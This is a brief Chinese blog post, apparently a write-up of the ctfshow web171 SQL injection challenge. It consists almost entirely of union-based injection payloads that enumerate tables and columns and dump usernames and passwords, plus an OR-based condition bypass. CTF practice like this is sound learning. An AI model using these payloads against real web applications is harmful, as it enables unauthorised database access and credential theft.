sql注入

web171

常规sql注入
payload:

1
2
3
4
5
6
-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user' --+

-1' union select id,username,password from ctfshow_user --+


payload:

1
-1' or id='26 

sql注入
http://example.com/2023/09/15/sql注入/
作者
奇怪的奇怪
发布于
2023年9月15日
许可协议